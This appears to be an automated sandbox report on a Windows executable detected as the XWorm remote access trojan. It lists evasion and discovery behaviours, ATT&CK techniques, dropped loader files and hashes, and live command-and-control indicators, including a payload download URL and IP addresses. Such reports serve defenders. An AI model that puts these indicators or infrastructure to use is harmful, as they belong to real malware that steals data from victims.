Source: C:\Users\user\Desktop\103__Installer.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_00B7DFDE
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	0_2_00B75FC5
Source: C:\Users\user\Desktop\103__Installer.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_00B7EF28

Source: C:\Users\user\Desktop\103__Installer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\103__Installer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\103__Installer.exe

Code function: 0_2_00B741BA GetSystemTimeAsFileTime,__aulldiv,

0_2_00B741BA

Source: C:\Users\user\Desktop\103__Installer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.16.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.16.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.16.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.16.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\103__Installer.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 0.2.103__Installer.exe.5f70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.103__Installer.exe.5f70000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3335683213.0000000005F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3335128746.0000000003DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 103__Installer.exe PID: 7572, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 0.2.103__Installer.exe.5f70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.103__Installer.exe.5f70000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3335683213.0000000005F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3335128746.0000000003DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 103__Installer.exe PID: 7572, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	151 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	141 Virtualization/Sandbox Evasion	Security Account Manager	141 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	34 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
103__Installer.exe	21%	ReversingLabs
103__Installer.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://upx.sf.net	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://guanlix.cn:881/103.ccp	0%	Avira URL Cloud	safe
http://guanlix.cn:881/103.ccpq	0%	Avira URL Cloud	safe
59.56.110.103	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
guanlix.cn	91.208.240.157	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://guanlix.cn:881/103.ccp	false	Avira URL Cloud: safe	unknown
59.56.110.103	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.16.dr	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	103__Installer.exe, 00000000.00000002.3335128746.0000000003DB1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://guanlix.cn:881/103.ccpq	103__Installer.exe, 00000000.00000002.3334093675.00000000014F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
91.208.240.157	guanlix.cn	unknown		139659	LUCID-AS-APLUCIDACLOUDLIMITEDHK	false
59.56.110.103	unknown	China		133774	CHINATELECOM-FUJIAN-FUZHOU-IDC1FuzhouCN	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1466314
Start date and time:	2024-07-02 19:23:56 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	103__Installer.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@2/7@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 28 Number of non-executed functions: 34
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92
Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: 103__Installer.exe

Simulations

Behavior and APIs

Time	Type	Description
13:24:49	API Interceptor	6439886x Sleep call for process: 103__Installer.exe modified
13:28:12	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.208.240.157	33__Installer.exe	Get hash	malicious	XWorm	Browse	guanlix.cn:881/330.ccp
	31__Installer.exe	Get hash	malicious	XWorm	Browse	guanlix.cn:881/31.ccp
	103-o_Installer.exe	Get hash	malicious	XWorm	Browse	guanlix.cn:881/103.ccp
	31-o_Installer.exe	Get hash	malicious	XWorm	Browse	guanlix.cn:881/31.ccp
	33-o_Installer.exe	Get hash	malicious	XWorm	Browse	guanlix.cn:881/33.ccp
59.56.110.103	103-o_Installer.exe	Get hash	malicious	XWorm	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
guanlix.cn	33__Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	31__Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	103-o_Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	31-o_Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	33-o_Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CHINATELECOM-FUJIAN-FUZHOU-IDC1FuzhouCN	103-o_Installer.exe	Get hash	malicious	XWorm	Browse	59.56.110.103
	mirai.spc.elf	Get hash	malicious	Mirai	Browse	203.15.232.74
	DCwYFBy6z7.elf	Get hash	malicious	Mirai, Moobot	Browse	121.204.142.151
	WE4VRokml7.elf	Get hash	malicious	Mirai, Moobot	Browse	27.151.169.129
	#U6700#U65b0#U7cfb#U7edf#U4e0a#U7ebf#U5bf9#U63a5#U6750#U6599#U4fe1#U606f_1282137129312371283.exe	Get hash	malicious	CobaltStrike	Browse	121.207.229.248
	7e5.docx.doc	Get hash	malicious	Unknown	Browse	27.155.113.139
	16knGm6BfY.elf	Get hash	malicious	Mirai, Moobot	Browse	59.56.113.151
	skt.ppc.elf	Get hash	malicious	Mirai	Browse	27.157.108.170
	wO2hW34tnC.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	218.66.110.222
	sora.arm.elf	Get hash	malicious	Mirai	Browse	27.157.108.174
LUCID-AS-APLUCIDACLOUDLIMITEDHK	33__Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	31__Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	103-o_Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	31-o_Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	33-o_Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	https://telegram-wv.icu/	Get hash	malicious	Unknown	Browse	103.143.81.212
	#U6ce1#U6ce1#U7801#U5ba2#U6237#U7aef.exe	Get hash	malicious	Unknown	Browse	45.136.13.176
	#U6ce1#U6ce1#U7801#U5ba2#U6237#U7aef.exe	Get hash	malicious	Unknown	Browse	45.136.13.176
	CXM5Rc4W2k.exe	Get hash	malicious	GhostRat	Browse	103.143.81.180
	CXM5Rc4W2k.exe	Get hash	malicious	GhostRat	Browse	103.143.81.180

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_103__Installer.e_543e9b5bf1d99de7872b8c34a610dcac6fe4_9792b471_b8d55630-627c-4954-8814-5f2f94326423\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.2517547462549623
Encrypted:	false
SSDEEP:	192:RqYfuOi2UN0BU/AjZTD4yX66zuiFAZ24IO8w:YYfuOi29BU/AjWyX/zuiFAY4IO8w
MD5:	C5E9A958D70D40923D453882DCAAE84F
SHA1:	8A599622D0DA2A33BE9EF6452677DC3766F9E2E4
SHA-256:	D03EC714151BA896B4ECFB29D3F9C50C01DBDF7F278B1E36BF9EA219C0E773A3
SHA-512:	E2F0A9A643BC49B4C74200B553D2E1BFB2DCA2389E87A167C1E18D2B725AEB6844C41C8735DE1389297EC05D6F805B19EB96127361BBB5B2DB92110DD51DC6B3
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.4.4.1.4.8.8.5.7.0.4.2.5.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.4.4.1.4.8.8.6.4.0.7.3.7.6.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.8.d.5.5.6.3.0.-.6.2.7.c.-.4.9.5.4.-.8.8.1.4.-.5.f.2.f.9.4.3.2.6.4.2.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.3.3.5.1.4.4.0.-.2.2.f.b.-.4.1.6.f.-.b.4.f.2.-.5.8.5.4.6.4.1.a.1.d.5.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.0.3._._.I.n.s.t.a.l.l.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.w.i.n.d.o.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.9.4.-.0.0.0.1.-.0.0.1.3.-.a.c.6.c.-.0.6.b.a.a.4.c.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.5.9.7.0.0.f.2.2.c.2.1.d.e.6.6.9.8.0.0.b.6.6.3.4.6.b.e.3.b.6.8.0.0.0.0.0.9.1.c.!.0.0.0.0.5.f.2.6.b.9.0.0.1.c.0.4.8.2.f.1.0.1.8.c.e.1.5.3.e.5.8.c.a.f.6.1.e.8.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5186.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Jul 2 17:28:06 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	353771
Entropy (8bit):	3.5682967330200746
Encrypted:	false
SSDEEP:	3072:MhwFpka8T4uEqxmeLTg/NyHm1vUaGyDe3UF6:qwYa8T4OpTg/NyHUVhK+6
MD5:	9A602E3F6AB0AF82F58F8F6F2E9C65DF
SHA1:	9DE0202FAFF890A9CF9074CCF10176847F7F789E
SHA-256:	427975DED050EB244A10AF1575C1EE921538BEEBF5E083957AB4613C37F863CD
SHA-512:	228FFEC8E31DA91460CEDDE08775DDE58B4C90207E8BF30C3FCA3A10E80435ECB0604EC962E8DEE86301DDACD79B7E5E3DA90F1E7699C3E0EEAF43982C3AD229
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........8.f........................0"..........d+..dh..........T.......8...........T...........0S..............<,..........(...............................................................................eJ..............GenuineIntel............T............7.f....r........................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER535C.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8434
Entropy (8bit):	3.696449317246591
Encrypted:	false
SSDEEP:	192:R6l7wVeJyJx67p6YWGSU+4kgmfZYAVbprZ89bpJsfpDm:R6lXJyf6N6Y3SUKgmfSAVwpifw
MD5:	EE824B01C41E286E2A2CB3D12C388F92
SHA1:	BC957467F5B7C9CAC693B45AFB00C9FEB4779A70
SHA-256:	C2872A72E55A0691CCF848D5E2134F1DC8868B6D0BE03A4E04320DA6E2DF70B7
SHA-512:	3041124FA99D9612F0D9574FE2D5D0031A3D6C98F547B511A6AF957CB9DE65B7550DF61EC1C11A22B3518F9A87B24C26778F235789C1583A39A4452DB16CAE46
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.7.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER537C.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4765
Entropy (8bit):	4.457823322209864
Encrypted:	false
SSDEEP:	48:cvIwWl8zsmnNJg77aI9H2zNWpW8VY8Ym8M4JMrtBFK+q8vqtHPAS88WSycd:uIjfmnnI7Q47V4JtK+P7Nycd
MD5:	0B2EF78F46E97AE88DCE37A6354C7258
SHA1:	F5CDAB970C54A86C622D2649E9A44638465A6C65
SHA-256:	8A1AFAA3BDFE79D9252D4D6405F80712E7C164D246D4C6A01F4F6671B5805AFD
SHA-512:	892038D30ABB9CF8AE0D5CF4963D76A1B7ABF0CC91C2BA82C5AFF0FFD6EF4166CB7AE16DDEB28D5E15A0F6E603252CD9A6012BE61314088F45A5583AC642305C
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="393630" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\Public\Downloads\ind.jpg

Download File

Process:	C:\Users\user\Desktop\103__Installer.exe
File Type:	data
Category:	dropped
Size (bytes):	71938
Entropy (8bit):	7.604678512981776
Encrypted:	false
SSDEEP:	1536:+Sjk79gZOcfNdQdX5kDjfjx1rwa7F0vGmM6eKXBwLsy1ETqfvu+P4Rtsj5o:S5gblOdX50jxJZJmMRKXBwLs/
MD5:	30DD8CD1E4557604F2F904623AC15350
SHA1:	4605B3E8F3FDDA4E22389CC655842D67A5A02D65
SHA-256:	6B3852E6F2BD2DF3A4AD5AD33009227E682BBB25B5C0F7EDFA0124C05B08138B
SHA-512:	B96490A8F2116250C5AA99F5C76895829F21595E40674AC828EF138598EF3D8BE0D3CA5F3BE4D3E250C2FB6D18B8108868032BE61E68868062A731EE27A23459
Malicious:	false
Yara Hits:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\Public\Downloads\ind.jpg, Author: unknown
Reputation:	low
Preview:	........]..._1.....R....i....F.cE[C....Yy......I.....`G.`9..A....<....xpQ&P&...5.#...H.rf...w...5-z.{\..ht..o>/..^...3.!...!M......sA...A.w.-+...P.u5....~k.I.w...%..A....P.1P8~..c.....4.S.6t..Fls..j&T.;vs.D.....b..D...0y.7).J.F.73...~.`..L.j.=.,E...Ktf....\|AN.............jTsH'....;...\6.A.e....$=............................................................................................................................................................................................................................................................($.=...V..3O...... .,.b...fB...C.=]\H.C{.}...Z..(Y'...+..2..j...wO....a&^..^.....{.........R.j..\|...."/}..."=j.V.....P...)C8....h.....`m..l.T.....K...#...v.Z.l:]....}....j.]....]..}Fu.S.O.S.u1.R ....@..Rq.......)6..HHX..}..........TO.kB$.M...Gq.....H...I(..1.SG`.!t<..[..A.zA........?.5.u....fcj6..<..;.;.Q.^.l3....5.Nh....;X.eA..~.......WJnE.. ...JU[ldI....b[.=0.....f>._....mc.....1...p..$4.....$}.....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\103[1].ccp

Download File

Process:	C:\Users\user\Desktop\103__Installer.exe
File Type:	data
Category:	dropped
Size (bytes):	71938
Entropy (8bit):	7.604678512981776
Encrypted:	false
SSDEEP:	1536:+Sjk79gZOcfNdQdX5kDjfjx1rwa7F0vGmM6eKXBwLsy1ETqfvu+P4Rtsj5o:S5gblOdX50jxJZJmMRKXBwLs/
MD5:	30DD8CD1E4557604F2F904623AC15350
SHA1:	4605B3E8F3FDDA4E22389CC655842D67A5A02D65
SHA-256:	6B3852E6F2BD2DF3A4AD5AD33009227E682BBB25B5C0F7EDFA0124C05B08138B
SHA-512:	B96490A8F2116250C5AA99F5C76895829F21595E40674AC828EF138598EF3D8BE0D3CA5F3BE4D3E250C2FB6D18B8108868032BE61E68868062A731EE27A23459
Malicious:	false
Yara Hits:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\103[1].ccp, Author: unknown
Reputation:	low
Preview:	........]..._1.....R....i....F.cE[C....Yy......I.....`G.`9..A....<....xpQ&P&...5.#...H.rf...w...5-z.{\..ht..o>/..^...3.!...!M......sA...A.w.-+...P.u5....~k.I.w...%..A....P.1P8~..c.....4.S.6t..Fls..j&T.;vs.D.....b..D...0y.7).J.F.73...~.`..L.j.=.,E...Ktf....\|AN.............jTsH'....;...\6.A.e....$=............................................................................................................................................................................................................................................................($.=...V..3O...... .,.b...fB...C.=]\H.C{.}...Z..(Y'...+..2..j...wO....a&^..^.....{.........R.j..\|...."/}..."=j.V.....P...)C8....h.....`m..l.T.....K...#...v.Z.l:]....}....j.]....]..}Fu.S.O.S.u1.R ....@..Rq.......)6..HHX..}..........TO.kB$.M...Gq.....H...I(..1.SG`.!t<..[..A.zA........?.5.u....fcj6..<..;.;.Q.^.l3....5.Nh....;X.eA..~.......WJnE.. ...JU[ldI....b[.=0.....f>._....mc.....1...p..$4.....$}.....

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.296059831234597
Encrypted:	false
SSDEEP:	6144:U41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+wW/mBMZJh1Vjt:J1/YCW2AoQ0Nid/wMHrVp
MD5:	47D4670EBAE6F1E7C598895C7D988734
SHA1:	2F34B43524FC00693304B32BA4C3E3787466C59E
SHA-256:	309D2E3911C9601B4E21C2054DBC6AC8340A515E14D249B64563B54FAF735D8A
SHA-512:	AD7B92972225CF1FCFEBD8FBE9798A03FD187E7C1B51479F04ABC31761913F6DE2047C9BC075590DCCCB09FEFEAA7B8B84001977159252EB261335663F582D0C
Malicious:	false
Reputation:	low
Preview:	regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.#.2............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.938024130303621
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	103__Installer.exe
File size:	249'344 bytes
MD5:	fba295e75a2c2fd0f205da0a14b76859
SHA1:	5f26b9001c0482f1018ce153e58caf61e80ecb8f
